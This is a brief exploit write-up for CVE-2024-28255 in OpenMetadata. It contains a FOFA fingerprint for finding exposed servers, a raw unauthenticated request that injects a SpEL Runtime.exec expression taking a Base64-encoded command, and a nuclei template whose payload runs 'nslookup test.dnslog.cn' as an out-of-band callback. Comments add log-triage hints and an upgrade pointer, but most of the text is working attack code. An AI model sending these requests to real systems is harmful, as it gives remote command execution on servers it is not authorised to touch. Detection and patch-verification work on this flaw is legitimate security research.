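## OpenMetadata命令执行(CVE-2024-28255)

The request below carries no credentials: it puts an encoded login path (`;v1%2fusers%2flogin`) into a path parameter of `/api/v1`, and the final path segment after `/events/subscriptions/validation/condition/` is a SpEL expression that the server evaluates. For triage, search access logs for `;` path parameters under `/api/v1` and for `T(java.lang.` in the request path; remediation is to upgrade to the patched OpenMetadata release named in the vendor advisory for this CVE.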
## fofa
```
icon_hash="733091897"
```
## poc
```
GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22Base64编码命令%22))) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Connection: close
Accept-Encoding: gzip
```
## nuclei POC
```
# Nuclei template for CVE-2024-28255 (OpenMetadata).
# It sends a single GET request without credentials and reports a match when the
# response body contains both "400" and "java.lang.ProcessImpl".
id: CVE-2024-28255

info:
  name: CVE-2024-28255
  author: xiaoming
  # NOTE(review): this is the template author's rating; confirm it against the
  # vendor advisory / CVE record before using it for prioritisation.
  severity: high
  description: OpenMetadata Command Execution
  metadata:
    max-request: 1
    # Empty query: the template carries no Shodan fingerprint.
    shodan-query: ""
    verified: true

http:
  - raw:
      # The path carries ";v1%2fusers%2flogin" as a path parameter on /api/v1 and a
      # SpEL expression as the last segment. The Base64 argument decodes to
      # "nslookup test.dnslog.cn", so a match means that command was started on the
      # scanned host and a DNS lookup for a third-party domain is attempted.
      # The matchers below do not use that DNS interaction; they key on the response
      # body only.
      # Server-side, the same request is recognisable in access logs by the ";" path
      # parameter under /api/v1 and by "T(java.lang." inside the URL path.
      # "|+" is a literal block scalar that keeps trailing newlines, so the blank
      # line that terminates the HTTP headers is preserved.
      - |+
        GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgdGVzdC5kbnNsb2cuY24=%22))) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
        Connection: close
        Accept-Encoding: gzip

    redirects: true
    # Only one matcher is defined, so the "and" across matchers has no effect here.
    matchers-condition: and
    matchers:
      # NOTE(review): nuclei matchers are normally labelled with `name`; confirm that
      # an `id` key is accepted by the nuclei version in use.
      - id: 1
        type: word
        part: body
        words:
          # "400" is matched as text inside the body, not as the HTTP status code;
          # presumably it is the code field of the server's error response.
          # NOTE(review): any body that happens to contain "400" satisfies this word.
          - "400"
          # java.lang.ProcessImpl is the class of the Process object returned by
          # Runtime.exec(); presumably the server echoes it in its error message once
          # the expression has been evaluated - confirm against a patched instance,
          # which should not return it.
          - java.lang.ProcessImpl
        # Both words must be present in the body for the matcher to fire.
        condition: and
```